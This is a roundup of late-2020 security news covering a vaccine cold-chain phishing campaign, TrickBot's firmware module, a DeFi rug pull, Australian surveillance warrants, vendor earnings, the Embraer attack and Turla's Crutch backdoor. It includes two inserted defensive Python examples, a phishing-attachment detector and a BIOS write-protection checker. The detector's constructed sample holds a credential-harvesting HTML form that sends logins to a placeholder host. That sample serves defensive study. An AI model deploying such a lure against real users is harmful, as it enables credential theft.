

    Mysterious phishing campaign targets organizations in COVID-19 vaccine cold chain

    IBM’s cyber-security division says that hackers are targeting companies associated with the storage and transportation of COVID-19 vaccines using temperature-controlled environments — also known as the COVID-19 vaccine cold chain.

    The attacks consisted of spear-phishing emails seeking to collect credentials for a target’s internal email and applications.
    While IBM X-Force analysts weren’t able to link the attacks to a particular threat actor, they said the phishing campaign showed the typical “hallmarks of nation-state tradecraft.”
    Government agencies and private companies targeted alike
    Targets of the attacks included a wide variety of companies, sectors, and government organizations. This included the European Commission’s Directorate-General for Taxation and Customs Union, an organization that monitors the movement of products across borders — including medical supplies.
    The attackers also targeted a company that manufactures solar panels used for solar-powered vaccine transport refrigerators and a petrochemical company that manufactures dry ice, also used for vaccine transportation.
    Further, the same threat actor also targeted a German IT company that makes websites for “pharmaceutical manufacturers, container transport, biotechnology and manufacturers of electrical components enabling sea, land and air navigation and communications.”

    According to IBM, the attackers specifically targeted select executives at each company, usually individuals working in sales, procurement, IT, and finance positions, who were likely to be involved in company efforts to support a vaccine cold chain.
    The selected targets typically received emails using the spoofed identity of a business executive from Haier Biomedical, a Chinese company which is part of the UN’s official Cold Chain Equipment Optimization Platform (CCEOP) program.
    “The subject of the phishing emails posed as requests for quotations (RFQ) related to the CCEOP program,” IBM researchers Melissa Frydrych and Claire Zaboeva said in a report today.

    The emails contained malicious HTML files as attachments that victims had to download and open locally. Once opened, the files prompted victims to enter various credentials to view the file.
    “This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement.” 
    All in all, companies in Germany, Italy, South Korea, Czech Republic, greater Europe, and Taiwan were targeted in this campaign.
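    As an added illustration (not part of the IBM report), the following Python triage routine flags an HTML attachment that shows the pattern just described: a locally rendered login prompt whose contents leave the machine, so the attacker never has to host a page. The sample attachment, the host name and all function names are constructed for this example.

```python
"""Static triage of an HTML e-mail attachment for the credential-prompt
pattern: a file that renders a login dialog locally and ships the typed
credentials to a remote host. The sample attachment below is constructed."""
import re
from html.parser import HTMLParser


class _LoginDialogScanner(HTMLParser):
    """Collect password inputs, form targets and inline script text."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_chunks = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}      # attrs may carry None values
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_chunks.append(data)


def assess_html_attachment(html: str) -> dict:
    """Return indicators and a verdict for one attachment body."""
    scanner = _LoginDialogScanner()
    scanner.feed(html)
    scanner.close()
    script = "\n".join(scanner.script_chunks)
    external_actions = [u for u in scanner.form_actions if re.match(r"https?://", u, re.I)]
    # Inline script that both names a remote URL and uses a sending primitive
    script_sends_remote = bool(re.search(r"https?://", script, re.I)) and bool(
        re.search(r"\b(fetch|XMLHttpRequest|sendBeacon|submit)\b", script))
    indicators = []
    if scanner.password_inputs:
        indicators.append("password field rendered by a local attachment")
    if external_actions:
        indicators.append("form posts to external host: " + ", ".join(external_actions))
    if script_sends_remote:
        indicators.append("inline script sends data to a remote URL")
    # A password prompt whose input leaves the machine is the signal; a
    # password field alone (an exported settings page, say) is not enough.
    suspicious = bool(scanner.password_inputs) and bool(external_actions or script_sends_remote)
    return {"suspicious": suspicious, "indicators": indicators}


# Constructed sample mimicking the lure: an "RFQ" that demands a login to view.
SAMPLE_RFQ_ATTACHMENT = """<html><body>
<h2>Request for Quotation</h2>
<p>This document is protected. Sign in with your corporate e-mail to view it.</p>
<form id="login">
  <input type="email" name="user">
  <input type="password" name="pass">
  <button type="submit">View document</button>
</form>
<script>
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault();
  fetch("https://harvester.example/collect", {method: "POST", body: new FormData(e.target)});
});
</script>
</body></html>"""

BENIGN_ATTACHMENT = "<html><body><h1>Newsletter</h1><p>Plain content, no forms.</p></body></html>"

if __name__ == "__main__":
    for name, body in (("rfq", SAMPLE_RFQ_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(name, assess_html_attachment(body))
```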
    COVID-19 companies repeatedly targeted in recent months 
    But this phishing operation is just the latest in a long list of different attacks by different threat actors that targeted the COVID-19 vaccine research field this year.
    Previous targets included Johnson & Johnson, Novavax, Genexine, Shin Poong Pharmaceutical, Celltrion, according to the Wall Street Journal, and AstraZeneca and Gilead, according to Reuters.
    Some of the attacks have been linked back to the governments of China, Iran, Russia, and North Korea.
    However, while the previous attacks targeted the vaccine makers directly, this particular campaign was different because it targeted their supply chain — suggesting threat actors are also looking for information on how to transport and store vaccines, and not only how to make them.
    The US Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency are scheduled to release a security alert later today about the phishing campaign spotted by IBM.
    The joint FBI and CISA alert comes after Interpol published a different security alert on Wednesday to warn that organized crime syndicates, active both in the real world and online, are most likely to infiltrate and disrupt vaccine supply chains for their own financial profits.
    Several pharmaceutical companies have announced this fall that they’ve developed successful COVID-19 vaccines, most of which are expected to enter broad distribution in early 2021 — if their supply chains don’t get disrupted.


    New TrickBot version can tamper with UEFI/BIOS firmware

    The operators of the TrickBot malware botnet have added a new capability that can allow them to interact with an infected computer’s BIOS or UEFI firmware.

    The new capability was spotted inside part of a new TrickBot module, first seen in the wild at the end of October, security firms Advanced Intelligence and Eclypsium said in a joint report published today.
    The new module has security researchers worried as its features would allow the TrickBot malware to establish more persistent footholds on infected systems, footholds that could allow the malware to survive OS reinstalls.
    In addition, AdvIntel and Eclypsium say the new module’s features could be used for more than just better persistence, such as:
      • Remotely bricking a device at the firmware level via a typical malware remote connection.
      • Bypassing security controls such as BitLocker, ELAM, Windows 10 Virtual Secure Mode, Credential Guard, endpoint protection controls like A/V, EDR, etc.
      • Setting up a follow-on attack that targets Intel CSME vulnerabilities, some of which require SPI flash access.
      • Reversing ACM or microcode updates that patched CPU vulnerabilities like Spectre, MDS, etc.
    But the good news is that “thus far, the TrickBot module is only checking the SPI controller to check if BIOS write protection is enabled or not, and has not been seen modifying the firmware itself,” according to AdvIntel and Eclypsium.
    “However, the malware already contains code to read, write, and erase firmware,” the two companies added.
    Researchers say that even if the feature has not been deployed to its full extent just yet, the fact that the code is present inside TrickBot suggests its creators plan to use it in certain scenarios.

    Appropriate cases may include the networks of larger corporations where the TrickBot gang may not want to lose access and may want to leave behind a more powerful boot-level persistence mechanism.
    This module could also be used in ransomware attacks, in which the TrickBot gang is often involved by renting access to its network of bots to ransomware crews.

    If companies who had their networks encrypted refuse to pay, the TrickBot module could be used to destroy their systems, AdvIntel and Eclypsium said.
    Or the module could also be used to prevent incident responders from finding crucial forensic evidence by crippling a system’s ability to boot-up.
    “The possibilities are almost limitless,” AdvIntel and Eclypsium said, highlighting the many other areas in which TrickBot also helps its customers operate.

    Feature powered via publicly available code
    But the addition of this feature to the TrickBot code also marks the first time that UEFI/BIOS tampering capabilities have been seen in common financially-motivated malware botnets.
    Prior to today’s report, the only malware strains known to have the ability to tamper with UEFI or BIOS firmware were LoJax and MosaicRegressor.
    Both are malware strains developed by government-sponsored hacking groups — LoJax by Russian hackers and MosaicRegressor by Chinese hackers.
    But according to Eclypsium, a company specializing in firmware security, the TrickBot gang didn’t develop its code from scratch. Its analysis suggests the gang has instead adapted publicly available code into a specialized module they could install on infected systems via the first-stage TrickBot loader.
    “Specifically, TrickBot uses the RwDrv.sys driver from the popular RWEverything tool in order to interact with the SPI controller to check if the BIOS control register is unlocked and the contents of the BIOS region can be modified,” Eclypsium said.
    “RWEverything (read-write everything) is a powerful tool that can allow an attacker to write to the firmware on virtually any device component, including the SPI controller that governs the system UEFI/BIOS,” Eclypsium said. “This can allow an attacker to write malicious code to the system firmware, ensuring that attacker code executes before the operating system while also hiding the code outside of the system drives.”
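    To show what that write-protection check looks like from the defender’s side, here is an added Python example (not code from the AdvIntel/Eclypsium report, nor from RWEverything) that decodes BIOS_CNTL and SPI protected-range register values, as dumped by a platform tool such as chipsec, and reports whether the BIOS region could be written from the operating system. The register bit layout, the FLOCKDN argument and all sample values are assumptions and constructed inputs for this example.

```python
"""Baseline check for SPI flash BIOS write protection, the property the
TrickBot module reads from the SPI controller before any firmware write
would be possible. Decodes register values already dumped by a platform
tool; the sample values below are constructed. Bit positions follow the
common Intel PCH layout and are an ASSUMPTION to verify against the
datasheet for your chipset:
  BIOS_CNTL bit 0 BIOSWE   BIOS Write Enable (1 = region writable now)
  BIOS_CNTL bit 1 BLE      BIOS Lock Enable (setting BIOSWE traps to SMM)
  BIOS_CNTL bit 5 SMM_BWP  SMM BIOS Write Protect (writes only from SMM)
  PRx bits 12:0 base, 28:16 limit (4 KiB units), bit 31 WPE (write protect)
"""
from dataclasses import dataclass, field
from typing import List, Tuple

BIOSWE, BLE, SMM_BWP = 1 << 0, 1 << 1, 1 << 5
PR_WPE = 1 << 31


@dataclass
class WriteProtectionReport:
    writable_now: bool                       # BIOSWE currently set
    lock_enforced: bool                      # BLE and SMM_BWP both set
    wp_ranges: List[Tuple[int, int]] = field(default_factory=list)
    region_covered: bool = False             # BIOS region inside one WPE range
    protected: bool = False
    findings: List[str] = field(default_factory=list)


def decode_protected_ranges(pr_values: List[int]) -> List[Tuple[int, int]]:
    """Return (base, limit) of every PRx register with write protection enabled."""
    ranges = []
    for pr in pr_values:
        if pr & PR_WPE:
            base = (pr & 0x1FFF) << 12
            limit = (((pr >> 16) & 0x1FFF) << 12) | 0xFFF
            ranges.append((base, limit))
    return ranges


def evaluate_bios_write_protection(bios_cntl: int, pr_values: List[int],
                                   bios_region: Tuple[int, int],
                                   flockdn: bool) -> WriteProtectionReport:
    """Decide whether an OS-level driver could write the BIOS region.

    flockdn: the SPI flash-lockdown bit from HSFS; without it the PRx
    registers themselves can be rewritten, so they protect nothing."""
    rep = WriteProtectionReport(writable_now=bool(bios_cntl & BIOSWE),
                                lock_enforced=bool(bios_cntl & BLE) and bool(bios_cntl & SMM_BWP))
    rep.wp_ranges = decode_protected_ranges(pr_values)
    lo, hi = bios_region
    rep.region_covered = flockdn and any(b <= lo and hi <= l for b, l in rep.wp_ranges)
    if rep.writable_now and not (bios_cntl & BLE):
        rep.findings.append("BIOSWE set with BLE clear: BIOS region writable from the OS")
    elif rep.lock_enforced:
        rep.findings.append("BLE and SMM_BWP set: writes only from SMM")
    elif bios_cntl & BLE:
        rep.findings.append("BLE set without SMM_BWP: relies on the SMI handler re-clearing BIOSWE")
    else:
        rep.findings.append("no lock bits: a driver can simply set BIOSWE")
    if rep.region_covered:
        rep.findings.append("BIOS region fully covered by a locked, write-protected PR range")
    elif rep.wp_ranges and not flockdn:
        rep.findings.append("PR ranges present but FLOCKDN clear: ranges are not locked")
    # Either mechanism on its own keeps the region read-only from ring 0.
    rep.protected = rep.lock_enforced or rep.region_covered
    return rep


if __name__ == "__main__":
    # Constructed: 8 MiB flash, BIOS region in the top 3 MiB.
    region = (0x500000, 0x7FFFFF)
    pr0 = PR_WPE | (0x7FF << 16) | 0x500            # covers 0x500000-0x7FFFFF
    for label, cntl, prs in (("locked", 0x22, [0] * 5),
                             ("pr-covered", 0x00, [pr0, 0, 0, 0, 0]),
                             ("open", 0x01, [0] * 5)):
        r = evaluate_bios_write_protection(cntl, prs, region, flockdn=True)
        print(f"{label:11} protected={r.protected}  {'; '.join(r.findings)}")
```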
    New feature added after failed takedown attempt
    But the timing of this discovery is also worth noting: the new TrickBot feature appears just as TrickBot is slowly coming back to life after a failed takedown attempt.
    Over the past few weeks, TrickBot operations have seen a flurry of updates, from new obfuscation techniques to new command-and-control infrastructure and new spam campaigns.

    All of these updates are aimed at reviving and shoring up one of today’s largest cybercrime-as-a-service botnet operations, which in its heyday controlled more than 40,000 infected computers each day.
    Sherrod DeGrippo, Senior Director for Threat Research and Detection at Proofpoint, told ZDNet that Proofpoint “has not observed a significant change in the Trick volumes despite the disruptive activities by US Cyber Command and the Microsoft-led coalition.”
    For now, TrickBot not only appears to have survived the takedown attempt, but is actually coming back to life with stronger features than before.
    “Every actor responds to changes in their operational environment differently,” DeGrippo added.
    “[TrickBot] has demonstrated that its botnet is resilient to disruptive actions by governments and security vendors; however, it is not immune to future disruption. We anticipate a higher velocity of infrastructure changes and malware updates to occur in the near term.”


    Compounder Finance DeFi project allegedly pulls the rug from under investors, $11 million stolen

    An exit scam allegedly performed by Compounder Finance DeFi developers has left investors $11 million out of pocket. 

    Compounder Finance called itself a “smarter farming” platform and a Harvest/Yearn Finance clone, as first reported by CoinDesk. 
    At the time of writing, the project’s website, Twitter, Medium, and Discord pages appear to have been deleted. 
    According to a cached version of a Medium blog post describing the project, dated November 8, Compounder Finance claimed to be an automated farming system offering compound interest on digital assets while also earning native CP3R tokens as a “reward.”
    “We will examine yields, security and complexity of new pools that will keep our stakers comfortable knowing they have a competitive edge to other farmers. We hope to offer the next generation of high-interest returns,” the developers claimed. 
    Pools supported ETH, DAI, USDT, and USDC.

    Compounder Finance, which launched only last month, promised investors that the Ethereum-based decentralized finance (DeFi) project enforced 24-hour time locks on all smart contracts in the interest of safety. What investors did not know is that the developers had allegedly built a hidden backdoor into the system.
    In a ‘rug-pull,’ otherwise known as the unexpected removal of liquidity from a token, once the platform had secured enough funding from eager investors, roughly $10.8 million in wrapped Bitcoin (WBTC), ETH, DAI, and other tokens was transferred out of the project. 
    DefiYield, a Twitter user who claims to have lost $1 million in investment due to the rug pull, has offered a $100,000 reward for any information leading to the identity of the threat actor, or any means to return stolen funds to victims.
    “As this is a substantial loss for me and many more crypto farmers, I will keep going on with the investigation and pushing the authorities now and in the coming years, until there will be a positive result,” the investor said. 
    A Telegram group has also been created for impacted investors to explore their legal options.
    Solidity Finance previously audited the project (.PDF) for external threat potential and flagged the suspicious time-locked smart contract setup, as well as the control maintained by the central development team. 
    Malicious strategy contracts were added after the audit, allowing the rug pull deployer to withdraw funds. 
    Solidity Finance, together with @vasa_develop from Stake Capital, has now published a post-mortem report on the rug pull.
    “The Compounder team swapped the safe/audited Strategy contracts and replaced them with malicious ‘Evil Strategy’ contracts that allowed them to steal user funds,” Solidity Finance said. “They did this through a public, though clearly unmonitored, 24-hour timelock. The team had the power to update strategy pools and they did so maliciously here.”
    At the time of writing, the CP3R token is worth $0.34, down from $80.18 on November 25.


    Surveillance Bill to hand AFP and ACIC a trio of new computer warrants

    The Australian government has put forward its Surveillance Legislation Amendment (Identify and Disrupt) Bill 2020 that would hand the Australian Federal Police (AFP) and the Australian Criminal Intelligence Commission (ACIC) three new warrants for dealing with online crime.
    The first warrant is a data disruption warrant, which according to the Bill’s explanatory memorandum is intended to be used to prevent “continuation of criminal activity by participants, and be the safest and most expedient option where those participants are in unknown locations or acting under anonymous or false identities”.
    The second is a network activity warrant that would allow the AFP and ACIC to collect intelligence from devices that are used, or likely to be used, by those subject to the warrant.
    “This means that data does not have to be stored on the devices, but can be temporarily linked, stored, or transited through them,” the memorandum states.
    “This will ensure data that is unknown or unknowable at the time the warrant is issued can be discovered, including data held on devices that have disconnected from the network once the criminal activity has been carried out.”
    The last warrant is an account takeover warrant that will allow the agencies to take control of an account for the purposes of locking a person out of the account.
    “Any other activities, such as accessing data on the account, gathering evidence, or performing undercover activities such as taking on a false identity, must be performed under a separate warrant or authorisation,” the memorandum said.

    “Those actions are not authorised by an account takeover warrant. The account takeover warrant is designed to support existing powers, such as computer access and controlled operations, and is not designed to be used in isolation.”
    Agencies would need to report twice a year to the Commonwealth Ombudsman and the Minister for Home Affairs on the use of takeover warrants.
    If the Bill is passed, the first two warrants could be issued by the Administrative Appeals Tribunal (AAT) or a suitable judge, while the takeover warrant would need approval by a magistrate.
    Because the memorandum frames network activity warrants as an intelligence tool, oversight of those warrants will fall to the Inspector-General of Intelligence and Security rather than the Commonwealth Ombudsman. Disclosing information on those warrants could incur two years’ jail, while disclosing information that harms an investigation or endangers a person is a 10-year offence.
    The Bill also introduces assistance orders, going some way towards fulfilling the fears about dragooning that many held, misplaced at the time, when the Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018 was introduced.
    Agencies will be able to ask an AAT member or judge to force a specified person to help them.
    “This item ensures that should the AFP or the ACIC be issued a data disruption warrant, they will be able to compel assistance in accessing devices, accessing and disrupting data, copying data, and converting documents,” the memorandum states.
    “The intent of this provision is not to allow law enforcement to compel assistance from industry, but rather from a person with knowledge of a computer to assist in disrupting data (such as a person who uses the computer).”
    However, in a subsequent example, the memorandum points out that people who are not the subject of a warrant could receive an assistance order as well.
    “The AFP or the ACIC may have been issued a data disruption warrant for the purposes of targeting a user of a child exploitation forum hosted on a web service. In the course of executing the warrant, they become aware of a system administrator who has knowledge of how to access the forum but is not necessarily involved in the conduct on the forum,” the memorandum explains.
    “The AFP or the ACIC could use this knowledge by obtaining an assistance order under new section 64B and compelling the administrator to assist them by providing access. This assistance could then be used to facilitate disruption activities such as a data modification.”
    Failing to comply with an assistance order is punishable by a maximum of 10 years in jail.
    In its opening, the memorandum said existing powers are not suitable for use on targets who are “actively seeking to obscure their identity and the scope of their activities”.
    “Cyber-enabled serious and organised crime, often enabled by the dark web and other anonymising technologies, such as bespoke encrypted devices for criminal use, present a direct challenge to community safety and the rule of law,” the memorandum says.
    “Many anonymising technologies and criminal methodologies can be combined for cumulative effect, meaning it is technically difficult, and time and resource intensive, for law enforcement to take effective action.
    “Just as online criminals are constantly changing their operations and reacting to new environments, the law must adapt in order to give law enforcement agencies effective powers of response.”
    The Bill was introduced to Parliament on Thursday by Minister for Home Affairs Peter Dutton.


    CrowdStrike revenue climbs 86% in strong Q3 results

    CrowdStrike published third quarter financial results on Wednesday, handily beating market expectations. The company’s non-GAAP net income per share was 8 cents on revenue of $232.5 million, an 86% increase year-over-year.

    Analysts were expecting EPS of zero cents per share on revenue of $212.6 million. Shares of CrowdStrike were up more than 12% in after hours trading. 
    Subscription revenue was $213.5 million, an 87% increase. Annual Recurring Revenue (ARR) increased 81% year-over-year and grew to $907.4 million as of October 31. Of that, $116.8 million was net new ARR added in the quarter.
    Meanwhile, the company said it added 1,186 net new subscription customers in the quarter for a total of 8,416 subscription customers at the end of Q3, representing 85% growth year-over-year. The share of CrowdStrike’s subscription customers that have adopted four or more cloud modules increased to 61%, and the share with five or more cloud modules increased to 44%.
    “Broad-based demand and strength in multiple areas of the business fueled our rapid 87% year-over-year subscription revenue growth, record net new ARR and record net new subscription customers,” said CrowdStrike CEO George Kurtz. “CrowdStrike’s robust growth at scale underscores our growing leadership in the Security Cloud category and the immense value we deliver to customers seeking to transform, consolidate and fortify their security posture.”
    For the fourth quarter, CrowdStrike expects revenue in the range of $245.5 million to $250.5 million, with earnings between 8 cents and 9 cents per share. Wall Street expects the company to report Q4 earnings of a penny per share on revenue of $230.3 million.



    Okta shares surge as fiscal Q3 results top expectations, forecast higher as well

    Okta, the eleven-year-old, San Francisco-based maker of software to secure enterprise identities and authorize computer usage, this afternoon reported fiscal third-quarter revenue and profit that both topped expectations, and offered a forecast for revenue that beat expectations as well.
    CEO Todd McKinnon called the results “strong,” and added that the company is “seeing the importance of a modern identity platform like the Okta Identity Cloud grow as businesses around the world accelerate their adoption of cloud-based applications and re-imagine their digital customer experiences.”
    For the three months ended in October, Okta reported revenue of $217 million and 4 cents per share in net profit.
    That compares to the average Street estimate of $202.8 million in revenue and a net loss of one penny per share.
    Okta said its remaining performance obligation, or RPO, a standard Wall Street measure for cloud companies’ future revenue potential, rose by 53% in the quarter to reach $1.58 billion.  
    Free cash flow in the quarter quadrupled, year over year, to $41.6 million, equating to just over 19% of revenue, the company said.   
    For the current quarter, the company sees revenue of $221 million to $222 million, above the average Wall Street estimate for $216 million.  

    Okta shares are up about 7% in late trading.



    Brazilian aerospace firm Embraer hit by cyberattack

    Brazilian aerospace and defence group Embraer has been targeted by a cyberattack that has impacted the company’s operations.
    According to a statement released by the global firm on Monday (30) the attack resulted in the “disclosure of data allegedly attributed to the company”.
    The incident was reported to the Brazilian Securities and Exchange Commission five days after it took place; Brazilian legislation requires immediate reporting of problems such as cyber attacks.
    The cyberattack was identified on November 25, 2020, and access to a single systems environment of the company was unavailable as a result, according to the Embraer statement.
    As a consequence of the attack, internal systems suffered a partial and temporary interruption, which temporarily impacted some operations.
    According to Brazilian newspaper O Globo, the incident was a ransomware attack that required a significant share of the company’s servers to be taken offline; Embraer is currently operating under a contingency plan with enhanced security.
    An investigation is being carried out to ascertain the origin and consequences of the attack, the Embraer statement noted.

    “The company is making every effort to investigate the circumstances of the attack, assess whether any potential impact on its business and third parties, and determine the measures to be taken,” it added.
    The Embraer news follows another major security incident in the Latin American country: the Brazilian Superior Court of Justice was hit last month by a major cyberattack that disrupted operations for more than two weeks.
    According to the president of the Superior Court, minister Henrique Martins, the event was “the worst-ever” cyberattack that a Brazilian government body has suffered, both in terms of the dimension and complexity involved.


    Cyber espionage campaign opens backdoor to steal documents from infected PCs

    A cyber espionage campaign is targeting the foreign ministry of a country in the European Union with the aid of a previously undocumented form of malware which provides a secret backdoor onto compromised Windows systems.
    Uncovered by cybersecurity researchers at ESET, the tools are designed to steal sensitive documents and other files by secretly exfiltrating them via Dropbox accounts controlled by the attackers.
    Dubbed Crutch by its developers, this malware campaign has been active from 2015 through to 2020, and researchers have linked it to the Turla hacking group due to similarities with previously uncovered Turla campaigns such as Gazer. The working hours of the group also coincide with UTC+3, the timezone in which Moscow sits. The UK’s National Cyber Security Centre (NCSC) is among those that have attributed Turla – also known as Waterbug and Venomous Bear – to Russia.
    The newly detailed Crutch campaign appears tailored towards very specific targets with the aim of stealing sensitive documents. ESET hasn’t revealed any specifics about the target, aside from that it was a ministry of foreign affairs in an EU country. This targeting fits in with previous Turla campaigns.
    However, Crutch isn’t a first-stage payload and is only deployed after cyber attackers have already compromised the target network – something which similar campaigns to this have achieved by using specially crafted spear-phishing attacks.
    Once Crutch is installed as a backdoor on the target system it communicates with a hardcoded Dropbox account which it uses to retrieve files while remaining under the radar because Dropbox is able to blend into normal network traffic.

    Analysis of the backdoor indicates that it has repeatedly been updated and changed over the years in order to maintain effectiveness while also keeping hidden.
    “The main malicious activity is exfiltration of documents and other sensitive files. The sophistication of the attacks and technical details of the discovery further strengthen the perception that the Turla group has considerable resources to operate such a large and diverse arsenal,” said Matthieu Faou, malware researcher at ESET.
    However, despite the persistence of what is regarded as a sophisticated hacking operation, there are still some relatively simple security measures that organisations can apply to avoid falling victim to this and many other forms of cyber attack.
    “During this investigation, we noticed that attackers were able to move laterally and compromise additional machines by reusing admin passwords,” said Faou.
    “I believe that limiting lateral movement possibilities would greatly make the life of attackers harder. It means preventing users being able to run as admin, using two factor authentication on admin accounts and using unique and complex passwords,” he added.